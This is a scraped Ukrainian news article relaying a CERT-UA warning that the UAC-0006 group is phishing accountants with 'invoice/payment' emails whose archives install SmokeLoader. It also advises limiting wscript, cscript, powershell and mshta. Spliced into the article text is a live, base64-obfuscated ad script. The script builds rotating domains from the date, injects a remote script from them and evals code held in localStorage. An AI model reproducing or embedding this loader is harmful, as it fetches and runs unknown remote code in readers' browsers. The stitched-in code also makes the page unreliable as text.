У Держспецзв’язку попередили громадян про нову небезпечну кібератаку: стало відомо, які листи злочинці розсилають на електронну пошту жертвам.
Про це інформує Акцент з посиланням на Телеграм-канал Державної служби спеціального зв’язку та захисту інформації України.
Так, повідомляється про зростаючий рівень загрози для бухгалтерів: почастішали кібератаки з використанням електронних листів на тему «рахунку / оплати».
«Урядова команда реагування на комп’ютерні надзвичайні події України CERT-UA, яка діє при Держспецзв’язку, за останні 10 діб зафіксувала третю кібератаку угрупування UAC-0006 з використанням листів на тему «рахунку / оплати»», — написали у Держспецзв’язку.
Як зазначено, у повідомленні, яке приходить користувачеві, є вкладення у вигляді архівного файлу, який містить файли та архіви з назвами на кшталт: «Платiжна iнструкцiя iпн та вытяг з реестру», «Витяг з реeстру вiд 24.07.2023р_Код документа…», тощо. Відкриття користувачем таких файлів призведе до завантаження і запуску шкідливої програми SmokeLoader.
Для масового розповсюдження електронних листів зловмисники використовують ботмережі (більше 1000 комп’ютерів). var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
На думку фахівців CERT-UA, активізація угрупування UAC-0006 може призвести до підвищення кількості випадків шахрайства з використанням систем дистанційного банківського обслуговування.
Керівникам підприємств та бухгалтерам необхідно звернути увагу на посилення захисту автоматизованих робочих місць, призначених для формування, підписання та відправки платежів шляхом застосування програмних засобів захисту. Також необхідно звернутися до системних адміністраторів для обмеження можливості запуску штатних утиліт (wscript.exe, cscript.exe, powershell.exe, mshta.exe) та фільтрації вихідних інформаційних потоків.
Раніше ця група вже неодноразово здійснювала схожі атаки. Інформацію щодо їхніх індикаторів компрометації можна отримати в попередніх інформаційних повідомленнях:
CERT-UA#6613CERT-UA#6757CERT-UA#6999
Дивіться також: Сьогодні на Запоріжжі через артобстріл РФ горіло хлібне поле: подробиці (ФОТО) (adsbygoogle = window.adsbygoogle || []).push({});
Підписуйтесь на Акцент в 
Источник: https://akzent.zp.ua/hakeri-nadsilayut-elektronni-listi-zaporizhtsiv-poperedzhayut-pro-nebezpechnu-kiberataku/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook
